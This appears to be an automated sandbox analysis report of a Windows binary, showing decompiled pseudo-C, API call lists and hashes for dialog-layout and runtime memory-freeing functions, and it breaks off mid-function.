                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C433D3, Relevance: .1, Instructions: 112COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
                                            • Instruction ID: 083dcecad634c637ab10a63b18d19f37423624041d7cd3af09fc137caee2f644
                                            • Opcode Fuzzy Hash: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
                                            • Instruction Fuzzy Hash: 7D31D3716147558FCB14DE28C8512AABFE0FB95300F10992DE8D5D7741C778EA19CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C35D7E, Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d070f8fd9b796f2c38e7f19d309df816890829f021e00daa3df470baabb5d45d
                                            • Instruction ID: de1ea62c15901aa8cdab78414e39f094bd53bd4653f0cc786750cef247868180
                                            • Opcode Fuzzy Hash: d070f8fd9b796f2c38e7f19d309df816890829f021e00daa3df470baabb5d45d
                                            • Instruction Fuzzy Hash: DD21C875A200218BCB18CF2EED9067E7351AB5A30174A812BEA569F2C1D578EA25C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3D70B, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 235COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00C3D70B(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				signed int _t104;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				signed int _t185;
				struct HWND__* _t186;
				struct HWND__* _t187;
				void* _t188;
				void* _t191;
				signed int _t192;
				long _t193;
				void* _t200;
				int* _t201;
				struct HWND__* _t202;
				void* _t204;
				void* _t205;
				void* _t207;
				void* _t209;
				void* _t213;

				_t202 = __ecx;
				_v2368.bottom = __ecx;
				E00C33E41( &_v2208, 0x50, L"$%s:", _a8);
				_t207 =  &_v2368 + 0x10;
				E00C411FA( &_v2208,  &_v2288, 0x50);
				_t96 = E00C52BB0( &_v2300);
				_t186 = _v8;
				_t155 = 0;
				_v2376 = _t96;
				_t209 =  *0xc6d5f4 - _t155; // 0x63
				if(_t209 <= 0) {
					L8:
					_t156 = E00C3CD7D(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t186,  &_v2352);
					GetClientRect(_t186,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t104 = _v2320.bottom;
					_t191 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t204 = _t191 - _v2304;
					_v2368.bottom = _t169 - _t104;
					if(_t156 == 0) {
						L15:
						_t221 = _a12;
						if(_a12 == 0 && E00C3CE00(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t186,  &_v2048);
						}
						L18:
						_t205 = _t204 - GetSystemMetrics(8);
						_t106 = GetWindow(_t186, 5);
						_t187 = _t106;
						_v2368.bottom = _t187;
						if(_t156 == 0) {
							L24:
							return _t106;
						}
						_t157 = 0;
						while(_t187 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t187,  &_v2320);
							_t170 = _v2320.top.left;
							_t192 = 0x64;
							asm("cdq");
							_t193 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xc6dfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
							_t106 = GetWindow(_t187, 2);
							_t187 = _t106;
							__eflags = _t187 - _v2384;
							if(_t187 == _v2384) {
								goto L24;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t158 = 0x64;
					asm("cdq");
					_t134 = _v2292 * _v2368.top;
					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
					_v2324 = _t160;
					asm("cdq");
					_t185 = _t134 % _v2352.top;
					_v2352.left = _t134 / _v2352.top + _t204;
					asm("cdq");
					asm("cdq");
					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
					if(_t163 < 0) {
						_t163 = 0;
					}
					if(_t200 < 0) {
						_t200 = 0;
					}
					 *0xc6dfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t186,  &_v2368);
					_t156 = _v2393;
					goto L15;
				} else {
					_t201 = 0xc6d154;
					do {
						if( *_t201 > 0) {
							_t9 =  &(_t201[1]); // 0xc633e0
							_t150 = E00C55460( &_v2288,  *_t9, _t96);
							_t207 = _t207 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t201[1]); // 0xc633e0
								if(E00C3CF57(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t201 =  &(_t201[3]);
						_t213 = _t155 -  *0xc6d5f4; // 0x63
					} while (_t213 < 0);
					goto L8;
				}
			}



















































                                            0x00c3d723
                                            0x00c3d72d
                                            0x00c3d731
                                            0x00c3d736
                                            0x00c3d748
                                            0x00c3d752
                                            0x00c3d757
                                            0x00c3d75e
                                            0x00c3d761
                                            0x00c3d765
                                            0x00c3d76b
                                            0x00c3d7c8
                                            0x00c3d7e0
                                            0x00c3d7e8
                                            0x00c3d7ec
                                            0x00c3d7f8
                                            0x00c3d80a
                                            0x00c3d811
                                            0x00c3d815
                                            0x00c3d818
                                            0x00c3d820
                                            0x00c3d826
                                            0x00c3d82c
                                            0x00c3d8cd
                                            0x00c3d8cd
                                            0x00c3d8d5
                                            0x00c3d906
                                            0x00c3d906
                                            0x00c3d90c
                                            0x00c3d917
                                            0x00c3d919
                                            0x00c3d91f
                                            0x00c3d921
                                            0x00c3d927
                                            0x00c3d9d9
                                            0x00c3d9d9
                                            0x00c3d9d9
                                            0x00c3d92d
                                            0x00c3d9c7
                                            0x00c3d934
                                            0x00c3d93a
                                            0x00000000
                                            0x00000000
                                            0x00c3d946
                                            0x00c3d950
                                            0x00c3d965
                                            0x00c3d96a
                                            0x00c3d96d
                                            0x00c3d983
                                            0x00c3d98b
                                            0x00c3d98d
                                            0x00c3d98e
                                            0x00c3d996
                                            0x00c3d9a8
                                            0x00c3d9af
                                            0x00c3d9b8
                                            0x00c3d9be
                                            0x00c3d9c0
                                            0x00c3d9c4
                                            0x00000000
                                            0x00000000
                                            0x00c3d9c6
                                            0x00c3d9c6
                                            0x00c3d9c6
                                            0x00000000
                                            0x00c3d9c7
                                            0x00c3d83a
                                            0x00000000
                                            0x00000000
                                            0x00c3d847
                                            0x00c3d848
                                            0x00c3d851
                                            0x00c3d856
                                            0x00c3d85c
                                            0x00c3d860
                                            0x00c3d861
                                            0x00c3d867
                                            0x00c3d871
                                            0x00c3d878
                                            0x00c3d881
                                            0x00c3d885
                                            0x00c3d889
                                            0x00c3d88b
                                            0x00c3d88b
                                            0x00c3d88f
                                            0x00c3d891
                                            0x00c3d891
                                            0x00c3d8b7
                                            0x00c3d8c3
                                            0x00c3d8c9
                                            0x00000000
                                            0x00c3d76d
                                            0x00c3d76d
                                            0x00c3d772
                                            0x00c3d775
                                            0x00c3d778
                                            0x00c3d780
                                            0x00c3d785
                                            0x00c3d78a
                                            0x00c3d79b
                                            0x00c3d7a5
                                            0x00c3d7b2
                                            0x00c3d7b2
                                            0x00c3d7a5
                                            0x00c3d7b8
                                            0x00c3d7b8
                                            0x00c3d7bc
                                            0x00c3d7bd
                                            0x00c3d7c0
                                            0x00c3d7c0
                                            0x00000000
                                            0x00c3d772

                                            APIs
                                            • _swprintf.LIBCMT ref: 00C3D731
                                              • Part of subcall function 00C33E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C33E54
                                              • Part of subcall function 00C411FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00C3D74D,?,00000000,00000000,?,?,?,00C3D74D,?,?,00000050), ref: 00C41217
                                            • _strlen.LIBCMT ref: 00C3D752
                                            • SetDlgItemTextW.USER32(?,00C6D154,?), ref: 00C3D7B2
                                            • GetWindowRect.USER32(?,?), ref: 00C3D7EC
                                            • GetClientRect.USER32(?,?), ref: 00C3D7F8
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C3D896
                                            • GetWindowRect.USER32(?,?), ref: 00C3D8C3
                                            • SetWindowTextW.USER32(?,?), ref: 00C3D906
                                            • GetSystemMetrics.USER32(00000008), ref: 00C3D90E
                                            • GetWindow.USER32(?,00000005), ref: 00C3D919
                                            • GetWindowRect.USER32(00000000,?), ref: 00C3D946
                                            • GetWindow.USER32(00000000,00000002), ref: 00C3D9B8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                            • String ID: $%s:$CAPTION$d
                                            • API String ID: 2407758923-2512411981
                                            • Opcode ID: 43554b2dba3640fb546367b7455a2cdf66ca1216c2c2c7bf288ea9163b0518ae
                                            • Instruction ID: dfb8d0bc291e369e3bb0be9734b389c0d3b1e794819e978c58e5336f2d24ac7e
                                            • Opcode Fuzzy Hash: 43554b2dba3640fb546367b7455a2cdf66ca1216c2c2c7bf288ea9163b0518ae
                                            • Instruction Fuzzy Hash: 9881A272608301AFD720DFA9DD85B6FBBE9EB89704F04091DF996E3290D670E9058B52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5B784, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C5B784(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xc6dd50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00C57A50(_t46);
							E00C5B363( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00C57A50(_t47);
							E00C5B461( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00C57A50( *((intOrPtr*)(_t74 + 0x7c)));
						E00C57A50( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00C57A50( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00C57A50( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00C57A50( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00C57A50( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00C5B8F7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xc6d818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00C57A50(_t31);
							E00C57A50( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00C57A50(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00C57A50(_t74);
			}















                                            0x00c5b78c
                                            0x00c5b790
                                            0x00c5b798
                                            0x00c5b7a1
                                            0x00c5b7a6
                                            0x00c5b7ad
                                            0x00c5b7b5
                                            0x00c5b7bd
                                            0x00c5b7c8
                                            0x00c5b7ce
                                            0x00c5b7cf
                                            0x00c5b7d7
                                            0x00c5b7df
                                            0x00c5b7ea
                                            0x00c5b7f0
                                            0x00c5b7f4
                                            0x00c5b7ff
                                            0x00c5b805
                                            0x00c5b7a6
                                            0x00c5b806
                                            0x00c5b80e
                                            0x00c5b821
                                            0x00c5b834
                                            0x00c5b842
                                            0x00c5b84d
                                            0x00c5b852
                                            0x00c5b85b
                                            0x00c5b863
                                            0x00c5b864
                                            0x00c5b86a
                                            0x00c5b86d
                                            0x00c5b870
                                            0x00c5b877
                                            0x00c5b879
                                            0x00c5b87d
                                            0x00c5b885
                                            0x00c5b88c
                                            0x00c5b892
                                            0x00c5b893
                                            0x00c5b893
                                            0x00c5b89a
                                            0x00c5b89c
                                            0x00c5b8a1
                                            0x00c5b8a9
                                            0x00c5b8ae
                                            0x00c5b8af
                                            0x00c5b8af
                                            0x00c5b8b2
                                            0x00c5b8b5
                                            0x00c5b8b8
                                            0x00c5b8bb
                                            0x00c5b8bb
                                            0x00c5b8cd

                                            APIs
                                            • ___free_lconv_mon.LIBCMT ref: 00C5B7C8
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B380
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B392
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B3A4
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B3B6
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B3C8
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B3DA
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B3EC
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B3FE
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B410
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B422
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B434
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B446
                                              • Part of subcall function 00C5B363: _free.LIBCMT ref: 00C5B458
                                            • _free.LIBCMT ref: 00C5B7BD
                                              • Part of subcall function 00C57A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5B4F8,?,00000000,?,00000000,?,00C5B51F,?,00000007,?,?,00C5B91C,?), ref: 00C57A66
                                              • Part of subcall function 00C57A50: GetLastError.KERNEL32(?,?,00C5B4F8,?,00000000,?,00000000,?,00C5B51F,?,00000007,?,?,00C5B91C,?,?), ref: 00C57A78
                                            • _free.LIBCMT ref: 00C5B7DF
                                            • _free.LIBCMT ref: 00C5B7F4
                                            • _free.LIBCMT ref: 00C5B7FF
                                            • _free.LIBCMT ref: 00C5B821
                                            • _free.LIBCMT ref: 00C5B834
                                            • _free.LIBCMT ref: 00C5B842
                                            • _free.LIBCMT ref: 00C5B84D
                                            • _free.LIBCMT ref: 00C5B885
                                            • _free.LIBCMT ref: 00C5B88C
                                            • _free.LIBCMT ref: 00C5B8A9
                                            • _free.LIBCMT ref: 00C5B8C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                            • String ID:
                                            • API String ID: 161543041-0
                                            • Opcode ID: 5d9e744033c1ed7ae52a68053af6105eaa5407d35455ffdad969297c4b7c67c7
                                            • Instruction ID: ee6101c9155edd7bc359c8c44e84cf421c9d0e901f18fc1f79ec748caef66f66
                                            • Opcode Fuzzy Hash: 5d9e744033c1ed7ae52a68053af6105eaa5407d35455ffdad969297c4b7c67c7
                                            • Instruction Fuzzy Hash: 5C3153355047059FDF209A39E845B5B7BE8EF00352F106529E869D7192DF31AEC8E72C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4C343, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C4C343(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				short _v4124;
				void* _t10;
				struct HWND__* _t11;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				struct HWND__* _t34;
				void* _t45;

				_t45 = __fp0;
				_t29 = __edx;
				E00C4D940();
				_t10 = E00C4952A(__eflags);
				if(_t10 == 0) {
					return _t10;
				}
				_t11 = GetWindow(_a4, 5);
				_t34 = _t11;
				_t31 = 0;
				_a4 = _t34;
				if(_t34 == 0) {
					L11:
					return _t11;
				}
				while(_t31 < 0x200) {
					GetClassNameW(_t34,  &_v4124, 0x800);
					if(E00C41410( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t28 = SendMessageW(_t34, 0x173, 0, 0);
						if(_t28 != 0) {
							GetObjectW(_t28, 0x18,  &_v28);
							_t21 = E00C4958C(_v20);
							SendMessageW(_t34, 0x172, 0, E00C4975D(_t29, _t45, _t28, E00C49549(_v24), _t21));
							DeleteObject(_t28);
						}
					}
					_t11 = GetWindow(_t34, 2);
					_t34 = _t11;
					if(_t34 != _a4) {
						_t31 = _t31 + 1;
						if(_t34 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}















                                            0x00c4c343
                                            0x00c4c343
                                            0x00c4c34b
                                            0x00c4c350
                                            0x00c4c357
                                            0x00c4c42e
                                            0x00c4c42e
                                            0x00c4c364
                                            0x00c4c36a
                                            0x00c4c36c
                                            0x00c4c36e
                                            0x00c4c373
                                            0x00c4c429
                                            0x00000000
                                            0x00c4c42a
                                            0x00c4c37a
                                            0x00c4c393
                                            0x00c4c3ac
                                            0x00c4c3ce
                                            0x00c4c3d2
                                            0x00c4c3db
                                            0x00c4c3e4
                                            0x00c4c402
                                            0x00c4c409
                                            0x00c4c409
                                            0x00c4c3d2
                                            0x00c4c412
                                            0x00c4c418
                                            0x00c4c41d
                                            0x00c4c41f
                                            0x00c4c422
                                            0x00000000
                                            0x00000000
                                            0x00c4c422
                                            0x00000000
                                            0x00c4c41d
                                            0x00000000

                                            APIs
                                            • GetWindow.USER32(?,00000005), ref: 00C4C364
                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 00C4C393
                                              • Part of subcall function 00C41410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00C3ACFE,?,?,?,00C3ACAD,?,-00000002,?,00000000,?), ref: 00C41426
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C4C3B1
                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00C4C3C8
                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00C4C3DB
                                              • Part of subcall function 00C4958C: GetDC.USER32(00000000), ref: 00C49598
                                              • Part of subcall function 00C4958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C495A7
                                              • Part of subcall function 00C4958C: ReleaseDC.USER32(00000000,00000000), ref: 00C495B5
                                              • Part of subcall function 00C49549: GetDC.USER32(00000000), ref: 00C49555
                                              • Part of subcall function 00C49549: GetDeviceCaps.GDI32(00000000,00000058), ref: 00C49564
                                              • Part of subcall function 00C49549: ReleaseDC.USER32(00000000,00000000), ref: 00C49572
                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00C4C402
                                            • DeleteObject.GDI32(00000000), ref: 00C4C409
                                            • GetWindow.USER32(00000000,00000002), ref: 00C4C412
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                            • String ID: STATIC
                                            • API String ID: 1444658586-1882779555
                                            • Opcode ID: 65bc42f21374bdbba372a28f6f7ccc09707503b86a784daf4fcab973737745dc
                                            • Instruction ID: 6c04dd2e65458ebbfd97f50d33066cd1b311d837f5e001a5f6a551abdaba1c90
                                            • Opcode Fuzzy Hash: 65bc42f21374bdbba372a28f6f7ccc09707503b86a784daf4fcab973737745dc
                                            • Instruction Fuzzy Hash: D121D872A412247BE7316BA5DC8AFFF762CFF05750F009121FA12A60A1CBB48A4196B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C58422, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C58422(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xc64be0) {
					E00C57A50(_t52);
					_t26 = _a4;
				}
				E00C57A50( *((intOrPtr*)(_t26 + 0x3c)));
				E00C57A50( *((intOrPtr*)(_a4 + 0x30)));
				E00C57A50( *((intOrPtr*)(_a4 + 0x34)));
				E00C57A50( *((intOrPtr*)(_a4 + 0x38)));
				E00C57A50( *((intOrPtr*)(_a4 + 0x28)));
				E00C57A50( *((intOrPtr*)(_a4 + 0x2c)));
				E00C57A50( *((intOrPtr*)(_a4 + 0x40)));
				E00C57A50( *((intOrPtr*)(_a4 + 0x44)));
				E00C57A50( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00C582E8(5,  &_v8);
				_v8 =  &_a4;
				return E00C58338(4,  &_v8);
			}




                                            0x00c58428
                                            0x00c5842b
                                            0x00c58433
                                            0x00c58436
                                            0x00c5843b
                                            0x00c5843e
                                            0x00c58442
                                            0x00c5844d
                                            0x00c58458
                                            0x00c58463
                                            0x00c5846e
                                            0x00c58479
                                            0x00c58484
                                            0x00c5848f
                                            0x00c5849d
                                            0x00c584a5
                                            0x00c584ae
                                            0x00c584b6
                                            0x00c584ca

                                            APIs
                                            • _free.LIBCMT ref: 00C58436
                                              • Part of subcall function 00C57A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5B4F8,?,00000000,?,00000000,?,00C5B51F,?,00000007,?,?,00C5B91C,?), ref: 00C57A66
                                              • Part of subcall function 00C57A50: GetLastError.KERNEL32(?,?,00C5B4F8,?,00000000,?,00000000,?,00C5B51F,?,00000007,?,?,00C5B91C,?,?), ref: 00C57A78
                                            • _free.LIBCMT ref: 00C58442
                                            • _free.LIBCMT ref: 00C5844D
                                            • _free.LIBCMT ref: 00C58458
                                            • _free.LIBCMT ref: 00C58463
                                            • _free.LIBCMT ref: 00C5846E
                                            • _free.LIBCMT ref: 00C58479
                                            • _free.LIBCMT ref: 00C58484
                                            • _free.LIBCMT ref: 00C5848F
                                            • _free.LIBCMT ref: 00C5849D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: f8177881bb925dafe73d58ab3ded2bab1373b5553b366aa60d4ae24218885848
                                            • Instruction ID: 437e66e91208425f5e7f0dff41322b1705a0203df9db81d447357e5a60e385d1
                                            • Opcode Fuzzy Hash: f8177881bb925dafe73d58ab3ded2bab1373b5553b366aa60d4ae24218885848
                                            • Instruction Fuzzy Hash: 0211A779104108EFCF01EF64D842CDE3B65EF04351B4162A1FE194B122DA31DBD8BB84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3200C, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E00C3200C(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

